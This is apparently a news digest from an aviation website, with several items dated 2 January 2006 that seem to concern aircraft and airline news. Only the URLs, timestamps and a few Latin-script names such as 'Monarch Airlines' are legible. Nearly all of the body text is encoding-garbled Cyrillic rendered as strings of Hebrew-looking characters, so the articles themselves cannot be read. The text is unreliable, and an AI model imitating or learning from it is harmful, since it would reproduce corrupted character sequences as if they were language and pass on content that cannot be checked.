ֱ׳װֿװֱׂ־׃׀ֿׂװֽֿ, ׀ֹֿׂ׳ִֿ׃װ׳ֱ װֱֱֲ־ָ ִֵֹֹּ, װֵָ־ֵֹ׃ַֻֿֿ ֲֿ׃ּױײֹ׳ֱ־ֹׁ ׳ִֿױ־ָ ׃ױִֿ׳, ֻ׃׀ּױֱװֱֳֹֹ ־ֵֶװֲִֵֿ׳ְֱָֹ ׀ֹֿׂ׳ִֿ׃װ׳ ֹ װֱׂ־׃׀ֿׂװֱ ־ֵֶװֹ ֹ ֱֱַ.מֲִֵָֹֽֿֿֿ׃װ״ ׀ּֿױֵ־ֹׁ ֳֵֹּ־ֹ ־ֱ ִֿ־ֹ ׳ִֹ ִֵׁװֵּ״־ֿ׃װֹ ֿװֵֽ־ֵׁװ׃ׁ ׃ 1 ׁ־׳ֱׁׂ 2006 ֱִַֿ, ־ֱ ִׂױֵַֹ - ׃ 1 ׁ־׳ֱׁׂ 2007 ֱִַֿ, ֱ ִּׁ ֿ׃װֱּ״־ָ ׳ִֹֿ׳ ׀ִֵׂ׀ֹׂ־ֱֹֽװֵּ״׃ֻֿ ִֵׁװֵּ״־ֿ׃װֹ - װּֿ״ֻֿ ׀ֿ׃ֵּ ׳׃װױ׀ֵּ־ֹׁ ׳ ׃ֹּױ ׃ֿֿװ׳ֵװ׃װ׳ױְָֹ װֵָ־ֵֹ׃ָֹֻ ֱֵֵַּֽׂ־װֿ׳.פֱֻײֵ ֱֻֿ־ ױ׀ֱֵֿׂװ ׀ּֿױֵ־ֹׁ ֳֵֹּ־ֹ ֹ ױװֿ־ֵׁװ ׀ּֿ־ֹֽֿֿׁ ׃ֿֿװ׳ֵװ׃װ׳ױְָֹ ֱִֵֵֶּׂ״־ָ ֱַֿׂ־ֿ׳ ׳ֱּ׃װֹ. - - - - - זִֵֿֿׂ׳ֵֻ ׀ֲִֵֿׂױװ ׀ֱִִֹֻֿׁׂ - http://www.aviaport.ru/news/2006/01/02/99271.html - ‏ֹ־ֿ׳־ֹֹֻ ׀ֱׂ׳ֹװֵּ״׃װ׳ֱ ןֽ׃ֻֿ ֱֲּֿ׃װֹ ־ֱֿ׳ױװ ֵַ־ֱֵּׂ״־ַֿֿ ׀ֱִִֹֻֿׁׂ ׃װֹֿׂװֵּ״׃װ׳ֱ ־ֿ׳ַֿֿ ֱֿׂ׀ֿׂװֱ ןֽ׃ֻ-זִֵֿֿׂ׳ֱֻ - Mon, 02 Jan 2006 13:08:00 +0300 - כֱֻ ׃װֱּֿ ֹ׳ֵ׃װ־ֿ "", ׃ִֵַֿ־ׁ ֹ־ֿ׳־ֹֹֻ ׀ֱׂ׳ֹװֵּ״׃װ׳ֱ ןֽ׃ֻֿ ֱֲּֿ׃װֹ ־ֱֿ׳ױװ ֵַ־ֱֵּׂ״־ַֿֿ ׀ֱִִֹֻֿׁׂ ׃װֹֿׂװֵּ״׃װ׳ֱ ־ֿ׳ַֿֿ ֱֿׂ׀ֿׂװֱ ןֽ׃ֻ-זִֵֿֿׂ׳ֱֻ. מֿ׳ֵ ׳ִֿױ־ֵ ׳ֿֿׂװֱ ןֽ׃ֱֻ, ־ֱ ֱ׳ֵֵׂ־ֵֹ ׃װֹֿׂװֵּ״׃װ׳ֱ ֻֿװָֿׂ ׀ֿװֲֵׂױֵװ׃ׁ ֲֵֵּֿ 5 ִּֽׂ ׂױֲ., ֲױִױװ ׳׳ִֵֵ־ ׳ ֻ׃׀ּױֱװְֱֳֹ ױײֵ ׳ 2008 ִַֿױ. תֱ ׀ּֿױֵ־ֵֹ ֵַ־ֱֵּׂ״־ַֿֿ ׀ֱִִֿׁׂ, ׃װֹֽֿֿ׃װ״ ֻֿװַֿֿֿׂ װּֿ״ֻֿ ׳ ׃ִֵּױְֵֽ ִַֿױ ׀ֵׂ׳׃ֹװ 1 ִּֽׂ ׂױֲ., ׀ֿ׃׀ֿׁׂװ ֽֿ׃ֵֹֻ ׃װֹֿׂװֵּ״־ֵ ֻֽֿ׀ֱ־ֹֹ ןןן "נףז "נֵּֿװ ֹ כ" ֹ ןןן "מנן "םֿ׃װֿ׳ֹֻ",ֱ װֱֻײֵ װְֵֽ־׃ֱֻׁ תבן "בִִֽֿֿֿׂׂׂ׃װֿׂ".חֵ־ֱֵּׂ״־ַֿֿ ׀ֱִִֹֻֿׁׂ ׃װֹֿׂװֵּ״׃װ׳ֱ ֱֿׂ׀ֿׂװֱ ןֽ׃ֻ-זִֵֿֿׂ׳ֱֻ ׃׀ֱֳֵֹּ״־ֱׁ ֻֿ־ֻױׂ׃־ֱׁ ֹֻֽֿ׃׃ֹׁ ׀ֱׂ׳ֹװֵּ״׃װ׳ֱ נֹֹׂׂװ״ׁ ֿ׀ֱִֵֵּּׁׂ ׳ֱֵׂ ִֿ ׀ִֿ־ֵַֿ ׳ֱֵֵׂ. "ק װֵ־ִֵֵׂ ׀ֹׂ־ְֱֹֽװ ױֱ׃װֵֹ ֽֿ׃ֹֻ ֱֶֹֹּּ װְֵֽ־׃ַֻֿֿ תבן "בִִֽֿֿֿׂׂׂ׃װֿׂ", ֱ װֱֻײֵ ֵֽ׃װ־ֵ ׃װֹֿׂװֵּ״־ֵ ֻֽֿ׀ֱ־ֹֹ ןןן נףז "נֵּֿװ ֹ כ", ֹ ןןן מנן "םֿ׃װֿ׳ֹֻ", - ֱׂ׃׃ֱֱֻּ ־ֱֱּ״־ֹֻ ױ׀ֱׂ׳ֵּ־ֹׁ ֹֽ־ֹ׃װֵׂ׃װ׳ֱ ׀ֵּֽֿׂ־־ֿ ׀ֹּֿװֹֹֻ, װֱׂ־׃׀ֿׂװֱ ֹ ׃׳ֹׁ ׀ֱׂ׳ֹװֵּ״׃װ׳ֱ ןֽ׃ֻֿ ֱֲּֿ׃װֹ בֵֻּ׃ֱ־ִׂ נױֱֵֻׂ׳. נֿ ֵַֿ ׃ּֿ׳ֱֽ, ׀ֵׂװֵ־ִֵ־װ ־ֱ ׀ּֿױֵ־ֵֹ ֵַ־ֱֵּׂ״־ַֿֿ ׀ֱִִֿׁׂ ִּֿײ־ ֲֹּ ֱֱִֻֿװ״, װֿ ְֱֱֲִּֿװ ׳׃ֵֹֽ ־ֲִֵָֹֹֽֽֿֿ ֱִֻֿׂ׳ֹֽ ֹ װֵָ־ֵֹ׃ֹֹֻֽ ׳ֽֿֿײ־ֿ׃װֹֽׁ ִּׁ ׳ִֵֵ־ֹׁ ׃װּֿ״ ֱֽ׃װֱֲ־ֿ ׃װֹֻֿׂ.מֱ׀ֽֿ־ֹֽ, ֲֿ ֱֻװֹ׳־ֽֿ ױֱ׃װֹֹ ֱֲּֿ׃װ־ָ ׳ֱּ׃װֵ ׳ ׃װֹֿׂװֵּ״׃װ׳ֵ ־ֿ׳ַֿֿ ֱֿׂ׀ֿׂװֱ ַױֲֵׂ־ֱװֿׂ לֵֿ־ִֹ נֵּֿײֱֵ׳ ֱׁ׳ֹּ 8 ֱֲִֵֻׁׂ װֵֻױֵַֿ ֱִַֿ ־ֱ ֱ׃ֱִֵ־ֹֹ ֱָֹׂװֵֻװױׂ־ֿ-ֱִַֿׂ׃װֹֿׂװֵּ״־ַֿֿ ׃ֿ׳ֵװֱ ֵַֹֿׂ־ֱ. "7 ־ֲֿׁׁׂ 2008 ֱִַֿ ֽ ׳ֵּװֹֽ ׃ ֱֿׂ׀ֿׂװֱ זִֵֿֿׂ׳ֱֻ. מױײ־ֿ ׃װֱ׳ֹװ״ ׀ִֵֵׂ ׃ֲֿֿ ׃ֵׂ״ֵ־ֵ ֱֱִֹ", - ׀ֱֲֵּֿֿ װֱִַֿ ַױֲֵׂ־ֱװֿׂ.מֱ ׃װֹֿׂװֵּ״׃װ׳ֿ ־ֿ׳ַֿֿ ֱֿׂ׀ֿׂװֱ ֱֻ־ֱ נֹֹׂׂװ״ׁ ׳ ֲױִױֵֽ ִַֿױ ׀ֿװֱׂװֹװ 1 ִּֽׂ ׂױֲ. כֱֻ ׃ֲֹּֿֿ ֹ. ֿ. ֹֽ־ֹ׃װֱׂ ֶֹ־ֱ־׃ֿ׳ ןֽ׃ֻֿ ֱֲּֿ׃װֹ םֱָֹֹּ צֱִ־ֿ׳, ֱׂ׃ִָֿ ־ֱ ׳ֿ׳ִֵֵ־ֵֹ ֱֿׂ׀ֿׂװֱ ׀ֱֻֿ ־ֵ ֱּֿײֵ־ ֿװִֵּ״־ֿ ׃װֻֿֿׂ ׳ ְֲִײֵװֵ נֹֹׂׂװ״ׁ ־ֱ 2006 ִַֿ. "װֱ ׃װֱװ״ׁ ֲױִֵװ ׀ֶֹֿׂ־ֱ־׃ֹֿׂ׳ֱ־ֱ ֱ ׃ֵװ ִֿ׀ּֿ־ֹװֵּ״־ָ ִִָֿֿֿ׳ ֱֻ־ ֹֹּ ׀ֱֵֵׂׂ׃׀ִֵֵֵּׂ־ֹׁ ֱ׃װֹ ֱׂ׃ִָֿֿ׳ ־ֱ ־ֵ׀ֹֹֿׂׂװֵװ־ֵ ֱֱִֹ", - ׃ֲֹּֿֿ ַֿ׃׀ִֹֿ־ צֱִ־ֿ׳.קֿ׳ִֵֵ־ֵֹ ׳ ןֽ׃ֵֻ ֱֿׂ׀ֿׂװֱ זִֵֿֿׂ׳ֱֻ ־ֱֱּֿ׃״ ׳ 1982 ִַֿױ. ףֱֱִ ֲֵֻֿװֱ ׳ ׃װֿׂ ֱֲּ ֱ׀ֱּ־ֹֿׂ׳ֱ־ֱ ־ֱ 1993 ִַֿ. ןִ־ֱֻֿ ֶֹ־ֱ־׃ֹֿׂ׳ֱ־ֵֹ ׃װֹֿׂװֵּ״׃װ׳ֱ ֲּֿ ׀ֱֵֵֻׂׂ־ֿ ׳ ־ֱֱֵּ 90-ָ ִַֿֿ׳, ֻ װֽֿױ ׳ֵֵֽׂ־ֹ ׳ֵּװ־ֿ-׀ֿ׃ֱִֿ־ֱׁ ׀ּֿֿ׃ֱ ֹ ֲֵֻֿװ ֹ־ֱֶׂ׃װׂױֻװױׂ ֲֹּ ַֿװֿ׳ ־ֱ 65%. ק ־ֱ׃װֹֿׁ ֵֽֽֿ־װ ־ִֵֿ׃װֵֿׂ־־ ֱֿׂ׀ֿׂװ ֱׂ׃׀ֱֱֵַּֿװ ׳ֵּװ־ֿ ׀ּֿֿ׃ֿ ִֹּ־ֿ 2930 ֽ ֹ ֻֿװֵּ״־ֿ ֽֿ־ֿ׃װ״ְ 54 םקװ. כ ֱֿׂ׀ֿׂװױ ׀ִֿ׳ִֵֵ־ ׳ִֿֿ׳ִֿ, ֵֻּװֿׂ׃ֵװֹ, ֱַֿ׀ֿׂ׳ִֿ ֹ ײֵֵּ־ִֿֿֿׂײ־ֱׁ ֱַֹֽ׃װֱּׂ״.זֹ־ֱ־׃ֹֿׂ׳ֱ־ֵֹ ׃װֹֿׂװֵּ״׃װ׳ֱ ־ֱ־ֵװ׃ׁ ׀ֿ׃ֵּ װַֿֿ, ֱֻֻ ֹ־ֿ׳־ֹֹֻ ֱֵׂװ ׳ֿ׀ֿׂ׃ ׃ ׀ֵֵׂ׳ִֽֿֿ זִֵֿֿׂ׳ֹֻ ׳ ֵַֹֿׂ־ֱּ״־ױְ ׃ֲֿ׃װ׳ֵ־־ֿ׃װ״. "ףֱֵ׃ ֽ ױײֵ ֱֲֿׂװֹֹּ׃״ ׳ ֿׂ׃׃ֹ׃ֵֻֿ ֱֵַ־װ׃װ׳ֿ "עֿ׃ֹֽױֵ׃װ׳ֿ". י ׀ֱֻֿ װֱ ׀ֳִֵֿׂױֱׂ (׀ֱֱִֵֵׂ ׳ ׃ֲֿ׃װ׳ֵ־־ֿ׃װ״ ֵַֹֿׂ־ֱ. - "") ־ֵ ֲױִֵװ ׀ֿׂ׳ִֵֵ־ֱ, ֻ ׃װֹֿׂװֵּ״׃װ׳ױ ֱֿׂ׀ֿׂװֱ ֽ ׀ֹׂ׃װױ׀ֱװ״ ־ֵ ֲױִֵֽ. ם ־ֵ ׃ֽֿ־ֵ׳ֱֵֽ׃ׁ, װֿ ׳׃ֵ ־ֲִֵֵָֹֽֿֿ ֲױֱַֹֽ ֲױִױװ ֵֶּֽֿֿׂ־ ׳ ׀ֵׂ׳ֽֿ ֻ׳ֱׂװֱֵּ ׃ִֵּױְֵַֿ ֱִַֿ", - ׀ִֵֹּּֿ׃ׁ ׀ַֿׂ־ֽֿֿ בֵֻּ׃ֱ־ִׂ נױֱֵֻׂ׳. נֿ ֵַֿ ֱִ־־ֽ, ׃ֿ׳ֻֿױ׀־ֵ ֱװֱׂװ ׀ֿ ֱ׳ֵֵׂ־ְֹ ׃װֹֿׂװֵּ״׃װ׳ֱ ־ֿ׳ַֿֿ ֽֿ׃ַֻֿֿ ֱֿׂ׀ֿׂװֱ ׃ֿ׃װֱ׳ׁװ ֲֵֵּֿ 5 ִּֽׂ ׂױֲ. נֿ ׃ּֿ׳ֱֽ ֹ. ֿ. ֵַ־ֱֵּׂ״־ַֿֿ ִֵֹֻׂװֱֿׂ ןבן "ןֽ׃ֻ-זִֵֿֿׂ׳ֱֻ" קֱֵֹּׁׂ נֿ׀ֿ׳ֱ, ִֿ 65% ֿװ ֲֵַֿֿ ֱֲֵֽֿ ֶֹ־ֱ־׃ֹֿׂ׳ֱ־ֹׁ ׳ ֲױִױֵֽ ִַֿױ ֲױִֵװ ־ֱ׀ֱׂ׳ֵּ־ֿ ־ֱ ֵֻֿׂ־׃װׂױְֳֹֻ ׳ֵּװ־ֿ-׀ֿ׃ֱִֿ־ֿ ׀ּֿֿ׃. "ףֱֵ׃ ־ױײ־ֿ ֲֵֿ׃׀ֵֹװ״ ֲֵ׃׀ֲֵֵֿׂ־ֵֿ ׃־ֱֲײֵ־ֵֹ ׃װֹֿׂװֵּ״־ֿ ׀ֱִֹֻּֿ ׳ִֿֿ ֹ ֵֻּװֵֹׂ׃װ׳ֽֿ, ׀ִַֿֿװֿ׳ֹװ״ ֵֽ׃װֱ ִּׁ ֱֵֵֽׂ־ֹׁ ְִֵּ ֹ װֵָ־ֹֹֻ, װֲֿ ׳ ֱ׀ֵֵּׂ ֽֿײ־ֿ ֲּֿ ׀ֹׂ׃װױ׀ֹװ״ ֻ ֱֻװֹ׳־ֽֿױ ׃װֹֿׂװֵּ״׃װ׳ױ", - ׃ֲֹּֿֿ ַֿ׃׀ִֹֿ־ נֿ׀ֿ׳.ןײֱִֵֹװ׃ׁ, װֿ ֵׂױּ״װֱװ ֻֿ־ֻױׂ׃ֱ ׀ֿ ֿ׀ִֵֵֵּׂ־ְֹ ֵַ־ֱֵּׂ״־ַֿֿ ׀ֱִִֹֻֿׁׂ ׃װֹֿׂװֵּ״׃װ׳ֱ ֱֿׂ׀ֿׂװֱ ןֽ׃ֻ-זִֵֿֿׂ׳ֱֻ ֹ־ֿ׳־ֹֹֻ ֲֿ־ֱִֿׂױְװ ׃ִֵַֿ־ׁ. - - - - - נֹֿׂ׳ִֹֿװֵֹּ ב־-140 ׃ֱַּֿ׃־ ׃ ׳׳ֱִֹֽֿ ֹֻֽֿ׃׃ֹֹ - http://www.aviaport.ru/news/2006/01/02/99270.html - נִֵׂ׃װֱ׳ֹװֵֹּ טחבננ ׀ִֿװ׳ִֵֹֹּׂ, װֿ ׃ֱַּֿ׃־ ׃ֿ ׳׃ֵֹֽ ׳׳ֱִֹֽֿ, ֻ ֻֿװֽֿׂ ׀ֱֹּׂ ֹֻֽֿ׃׃ֹׁ ׀ֿ ֱׂ׃׃ִֵּֿ׳ֱ־ְֹ ׀ֹֹׂ־ ֱֻװֱ׃װֶֿׂ ׃ֱֵּֽֿװֱ ב־-140 - Mon, 02 Jan 2006 13:05:00 +0300 - קֱֵׂ ׀ִֵׂ׃װֱ׳ֹװֵֹּ טֱׂ״ֻֿ׳׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ֱ׳ֱֳֹֹֿ־־ַֿֿ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ַֿֿ ׀ִֵׂ׀ֹׁׂװֹׁ (טחבננ) ׀ִֿװ׳ִֵֹֹּׂ, װֿ ׃ֱַּֿ׃־ ׃ֿ ׳׃ֵֹֽ ׳׳ֱִֹֽֿ, ֻ ֻֿװֽֿׂ ׀ֱֹּׂ ֹֻֽֿ׃׃ֹׁ ׀ֿ ֱׂ׃׃ִֵּֿ׳ֱ־ְֹ ׀ֹֹׂ־ ֱֻװֱ׃װֶֿׂ ׃ֱֵּֽֿװֱ ב־-140, ׳ ֱֲֿׂװֵ ֻֿװֿֿׂ ׀ֹׂ־ֱֹּֽ ױֱ׃װֵֹ טחבננ. נֿ׃ֵּ ֲֿ־ֱִֿֿׂ׳ֱ־ֹׁ ׀ֵׂ׳ָ ֵׂױּ״װֱװֿ׳ ֱׂ׃׃ִֵּֿ׳ֱ־ֹׁ ׳ ־ֵֻֿװָֿׂ ףםי ׀ֿׁ׳ֱֹּ׃״ ֹ־ֱֳֶֹֽֿׁׂ ֿ װֽֿ, װֿ ׀ֹֿׂ׳ִֹֿװֵֹּ ֱֲֹׂ׳ֵַֿ׃ׁ ׃ֱֵּֽֿװֱ ־ֵ ְֱִֵּׁׂװ ֽ־ֵ־ֵֹ ֹֻֽֿ׃׃ֹֹ. קֱֵׂ װֱ ֹ־ֱֳֶֹֽֿׁׂ ֱֲּ ֿ׀ֿׂ׳ֵַׂ־ױװֱ ִֵ׀ֱׂװֱֵֽ־װֽֿ ׀ֿ ׃׳ֽׁׁ ׃ ֲֵֿ׃װ׳ֵ־־ֿ׃װ״ְ טחבננ.כֹֽֿ׃׃ֹׁ, ׳ ׃ֿ׃װֱ׳ ֻֿװֿֿׂ ׳ֹּֿ ׀ִֵׂ׃װֱ׳ֹװֵֹּ במפכ ֹֽ. ב־װֿ־ֿ׳ֱ (ֱֱֲֿׂׂװֹֻ ׃ֱֵּֽֿװֱ), תֱ׀ֿֿׂײ׃ַֻֿֿ ֱֹֽ־ֿ׃װֹֿׂװֵּ״־ַֿֿ ֻֿ־׃װׂױֻװֿׂ׃ַֻֿֿ ְֲֿׂ "נֵַֿׂׂ׃׃" (ֱֱֲֿׂׂװֹֻ ִ׳ֱַֹװֵּׁ), טחבננ ֹ ֱ׀ֿֿׂײ׃ֻֿ ֻֽֿ׀ֱ־ֹֹ "םֿװֿׂ ףֹ" (׀ֹֿׂ׳ִֹֿװֵּ״ ִ׳ֱַֹװֵֵּ), ֱׂ׃ֶֹֿׂ׳ֱ׳ "ֵׂ־ ֹֻׁ" ׀ֱֹּׂ ֻ ׳׳ִֿױ, װֿ ־ֱ ׳׃ֿװֵ 2100 ֽ ׃ֱֵּֽֿװ ־ֱֱּ ׃־ֹײֵ־ֵֹ ׀ֿ ׃׀ֱֹֹּׂ, ׃ֿ׳ֵֹׂ׳ ֵװֵׂ ׳ֹװֱֻ. ‏ֵֵׂ ־ֵ׃ֻּֿ״ֻֿ ׃ֵֻױ־ִ ׃׳ׁ״ ׃ ֹֻ׀ֱײֵֽ ׀ֿׂ׀ֱֱּ, ׀ֿ׃ֵּ ֵַֿ ׃ֱֵּֽֿװ ֹ׃ֵ ׃ ֱֱִֿׂׂ׳. נֵׂ׳ֵ ֵׂױּ״װֱװ ֱׂ׃׃ִֵּֿ׳ֱ־ֹׁ ׀ֱֱֹֻּֿ, װֿ ִ׳ֱַֹװֵֹּ ׃ֱֵּֽֿװֱ, ׃ֹ׃װֵֽ ױ׀ֱׂ׳ֵּ־ֹׁ ֹ ־ֵַֿׂ׃־ֱֲײֵ־ֹׁ ֲֹּ ֹ׃׀ֱׂ׳־. נֹֹׂ־ֿ ֱֻװֱ׃װֶֿׂ ֱַּֽֿ ׃װֱװ״ ־ֵֹ׃׀ֱׂ׳־ֿ׃װ״ ֱ׳ֱַֹֹֿֿׂ־װֿ׳ - ׀ֲֹֿֿׂׂ׳, ׀ֱֻֿ׳ְֱָֹ ׀ּֿֿײֵ־ֵֹ ׃ֱֵּֽֿװֱ ׳ ׀ֿׂ׃װֱׂ־׃װ׳ֵ.מֱ׀ֽֿ־ֹֽ, װֿ 23 ֱֲִֵֻׁׂ ׀ִֿ גֱֻױ ׀ֹּֿֿֿׂ ֻׂױֵ־ֵֹ ׃ֱֵּֽֿװֱ ֱָׂ״ֻֿ׳׃ַֻֿֿ ׀ֹֿׂ׳ִֿ׃װ׳ֱ ב־-140, ׳׀ּֿ־ׁ׳ֵַֿ ֵׂ׃ גֱֻױ - בֻװֱױ. ק ֵׂױּ״װֱװֵ ֱֻװֱ׃װֶֿׂ ׀ֲַֹֹּֿ 23 ֵּֿ׳ֱֵֻ. נֱׂ׳ֹװֵּ״׃װ׳ֿ בֱֲִֵׂײֱ־ֱ ׀ֹֿׂ׃װֱ־ֿ׳ֹּֿ ֻ׃׀ּױֱװְֱֳֹ ׃ֱֵּֽֿװֿ׳ ב־-140 ִֿ ֻֿֿ־ֱ־ֹׁ ֱׂ׃׃ִֵּֿ׳ֱ־ֹׁ ׀ֹֹׂ־ ֱֻװֱ׃װֶֿׂ. - - - - - עֲֹֿ־ֿ־ "׀ֿ־ֵ׳ֵּֿ" - http://www.aviaport.ru/news/2006/01/02/99268.html - צֹװֵּ״ קֲֵֹֹֻּֿׂװֱ־ֹֹ, ײֱֵּ׳ֹ ׳׃װֵׂװֹװ״ מֿ׳ ִַֿ ׳ ֻֽֿ׀ֱ־ֹֹ ִׂױֵ ־ֱ ֿ׃װֿׂ׳ֵ פֵ־ֵֵֵֶׂ, ׀ֿ׀ֱּ ׳ ֱװׂױִ־ֹװֵּ״־ױְ ׃ֹװױְֱֳֹ, ׃װֱ׳ "עֲֹֿ־ֿ־ֽֿ ׀ֿ־ֵ׳ֵּֿ" - Mon, 02 Jan 2006 13:03:00 +0300 - צֹװֵּ״ קֲֵֹֹֻּֿׂװֱ־ֹֹ, ׃װֱׂ׃װ־ֿ ײֱֵּ׳ֹ ׳׃װֵׂװֹװ״ מֿ׳ ִַֿ ׳ ֻֽֿ׀ֱ־ֹֹ ִׂױֵ ־ֱ ֹ׃׀ֱ־׃ֻֽֿ ֿ׃װֿׂ׳ֵ פֵ־ֵֵֵֶׂ, ׀ֿ׀ֱּ ׳ ׳ֵ׃״ֱֽ ֱװׂױִ־ֹװֵּ״־ױְ ׃ֹװױְֱֳֹ, ׃װֱ׳ ׀ִֵֵׂ ׀ֱִׂ־ֹֻֽֿ "עֲֹֿ־ֿ־ֽֿ ׀ֿ־ֵ׳ֵּֿ".כֱֽֿ־ִֹׂ ֱ׳ֱֱֹּ־ֱֵׂ, ׃ִֵּֿ׳ֱ׳ֵַֿ ֵׂ׃ֽֿ ZB-558 ־ֱ פֵ־ֵֵֶֹׂ ֹ םֱ־ֵ׃װֱֵׂ, ׀ֹׂ־ּׁ ֵֵׂ־ֵֹ ׃ֿ׳ֵֹׂװ״ ־ֱֵ׀ֱּ־ֹֿׂ׳ֱ־־ױְ ׀ֿ׃ֱִֻױ, װֲֿ ׳׃ֱִֹװ״ ׀ֵֵׂ׀ֹ׳ֵַֿ ׳ֿ ׳ֵֽׁׂ ֵׂ׃ֱ ׀ֱ׃׃ֱײֱֹׂ. פֿװ ־ֱֱּ ׃ֻ׳ֵׂ־ֿ׃ּֿ׳ֹװ״ ׳ ֱִֵׂ׃ ׀ֱ׃׃ֱײֹֿׂ׳ ֹ ֱֻֽֿ־ִ, ׀ַֹֿׂ־ֹֿֿׂׂ׳ֱ׳ װֲֵֿׂ׳ֱ־ֵֹ ױ׃׀ֹֻֿֿװ״׃ׁ. ק װֿװ ֵֽֽֿ־װ ֱּ־ֵׂ, ־ֱ ֲֿׂװױ ֻֿװַֿֿֿׂ ־ֱִָֹֹּֿ׃״ 210 ֵּֿ׳ֵֻ, ֵּװֵּ ־ֱ ׳׃ֿװֵ ֻּֿֿֿ 10 ֵֹֻּֽֿװֿׂ׳.י ָֿװׁ ִֿ פֵ־ֵֵֶֹׂ ֿ׃װֱ׳ֱּֿ׃״ ׳׃ֵַֿ 45 ֹֽ־ױװ ׀ֵּֿװֱ, ֹֻ׀ֱײ ׀ֵֹּׂ ֻ ׳׳ִֿױ, װֿ ׀ֹׂ׃ױװ׃װ׳ֵֹ ׀״ׁ־ַֿֿ װױֹׂ׃װֱ ױַֿׂײֱֵװ ֲֵֿ׀ֱ׃־ֿ׃װֹ ׀ֵּֿװֱ. י ֵֹּׂ ׃ֿ׳ֵֹׂװ״ ־ֱֵ׀ֱּ־ֹֿׂ׳ֱ־־ױְ ׀ֿ׃ֱִֻױ, װֲֿ ׳׃ֱִֹװ״ ֲֹׂװֱ־ֱֳ ־ֱ ֵֻֿׂ־ֽֿ ֿ׃װֿׂ׳ֵֻ נֿׂװֿ-ףֱ־װֿ, ֱׂ׃׀ּֿֿײֵ־־ֽֿ ־ֱִֵֵֻּֿ ֿװ ׃ֵ׳ֵׂ־ַֿֿ ׀ֲֵֵֿׂײ״ׁ בֶֹֹֻׂ.ףױִׁ ׀ֿ ׳׃ֵֽױ, מֿ׳ ִַֿ ֵֽױ ׀ִֵֹׂװ׃ׁ ׳׃װֵׂװֹװ״ ־ֱ װֽֿ ֿ׃װֿׂ׳ֵֻ ׃ ־ֱ׃ֵֵּ־ֵֹֽ ׳ ֵװֵׂ װ׃ֹׁ ֵּֿ׳ֵֻ. תִֵ׃״ ־ֵװ ֱֹֻ־ֿ ֹ ־ֿ־ָ ֻּױֲֿ׳. ב ִֵֹ־׃װ׳ֵ־־ֽ ֱׂ׳ֵֵּ־ֵֹֽ ֵֽ׃װ־ָ ײֹװֵֵּ ֿ׃װְֱװ׃ׁ װּֿ״ֻֿ ׀ַֿׂױֹֻּ ׀ֿ ׀ֵ׃ֱ־ֽ ְִ־ֱֽ. נֱׂ׳ֱִ, ֵֹֽ־־ֿ ־ֱ װֽֿ ֿ׃װֿׂ׳ֵ, ׃ֱַּֿ׃־ֿ ׀ֱִֵׂ־ֹֽׁ, ־ֵ׃ֻּֿ״ֻֿ ׃װֵּֿװֹ ־ֱֱִ ֲױִױֹ ׀ֵׂ׳ֿֿװֻׂ׳ֱװֵּ״ בֵֹֹֻֽׂ טֹׂ׃װֶֿֿׂ כּֿױֲֽ ׀ֿ־ֱֹֻּֽֿ׃ׁ ׃ֿ ׃׳ֵֿ ֲױִױֵ ײֵ־ֿ. פֱֻ נֿׂװֿ-ףֱ־װֿ ׳ֵּֿ ׳ ֹ׃װְֹֿׂ.ק׀ֵֽֿׂ, ױ ֲֹׂװֱ־׃ַֻֿֿ "עֲֹֿ־ֿ־ֱ" ֵֵ ֿ׃װֱֵװ׃ׁ ֱ־׃ ֱֲִֿׂװ״׃ׁ ֻ ׀ֱִׂ־ֹֻױ ־ֱ פֵ־ֵֵֶֹׂ. נֱׂ׳ֱִ, װֵ׀ֵׂ״ ֵֽױ ׀ִֵֹׂװ׃ׁ ׳ֱֲֹׂװ״: ֲֹּֿ ֿװ׀ֱׂ׳ֹװ״׃ׁ ־ֱ ֿ׃װֿׂ׳ םֱֱִֵׂ ־ֱ ׀ֱֵֽֿׂ ֹ ױײֵ ֿװװױֱִ ׀ֵֵׂ׃ֵ׃װ״ ־ֱ ִׂױַֿ ׃ֱֵּֽֿװ ִֿ ֵֽ׃װֱ ־ֱ־ֱֵ־ֹׁ, ֲֹּֿ ׳ֵׂ־ױװ״׃ׁ ִֽֿֿ ׳ ב־ְַֹּ.ב׳ֱֹֻֽֿ׀ֱ־ֹׁ Monarch Airlines ׀ֱֻֿ ֵֵ ־ֵ ֱֵֹּׂ, ׀ֱִֿ׳ֱװ״ ֹּ ׳ ׃ױִ ־ֱ ־ֱֱִֵֹּ׳ַֿֿ ֲֹׂװֱ־ֱֳ ׳ ׃׳ֹׁ ׃ ־ֱֵ׀ֱּ־ֹֿׂ׳ֱ־־ֽ ֵֹֽ־ֵ־ֵֹֽ ֱֽׂׂױװֱ, ֻֿװֵֿֿׂ, ׀ֿ ׃ּֿ׳ֱֽ ׀ִֵׂ׃װֱ׳ֹװֵּׁ ֻֽֿ׀ֱ־ֹֹ, ֲּֿֿֿ׃״ ֵ ׳ ־ֵ׃ֻּֿ״ֻֿ װ׃ׁ ֶױ־װֿ׳ ׃װֵֹּׂ־ַֿ׳.כ׃װֱװֹמֵ׃ֽֿװׁׂ ־ֱ ֵװֱֵָׂ׃ֿ׳ױְ ֱִֵׂײֻױ, ׀ֱ׃׃ֱײֹׂ ׀ּֿ־ֿ׃װ״ְ ׀ִִֵֿׂײֱֹּ ֵֵׂ־ֵֹ ֹֻ׀ֱײֱ ׳׃ֱִֹװ״ ׃ֻ׳ֵׂ־ֿ׃ּֿ׳ֱ. כֱֻ ׃ֱֲֹּֿֿ הײֿ עֲֵֿׂװ׃ֿ־, ׀ִֵׂ׃װֱ׳ֹװֵּ״ ֱ׳ֱֹֻֽֿ׀ֱ־ֹֹ Monarch Airlines, ־ֱׂױֹװְֵּ ׃׀ֻֿֿ׃װ׳ֹׁ ׀ִֵּֿׂײֹֹּ ׀ִֿ׀ֹ׃ֱװ״ ׀ֿׂװֻּֿֿ, ִֵַ ֲּ ֱֶֹֻ׃ֹֿׂ׳ֱ־ ֱֶֻװ ֵַֿ ־ֵ׀ְֱֲִֵַֿֿֿ ׀ֿ׳ִֵֵ־ֹׁ, ִֿ־ֱֻֿ װֿװ ֿװֱֱֻּ׃ׁ װֿ ׃ֱִֵּװ״. - - - - - קִֿױ־ֵֿ ׀ֿׂ׃װֱׂ־׃װ׳ֿ טֱֱֲֿׂ׳׃ֱֻ ׀ױ׃װױֵװ - http://www.aviaport.ru/news/2006/01/02/99269.html - נֵׂ׳ַֿֿ ׁ־׳ֱׁׂ ֹ טֱֱֲֿׂ׳׃ֱֻ ־ֵ ׳ֵּװֹװ ־ֹ ִֹֿ־ 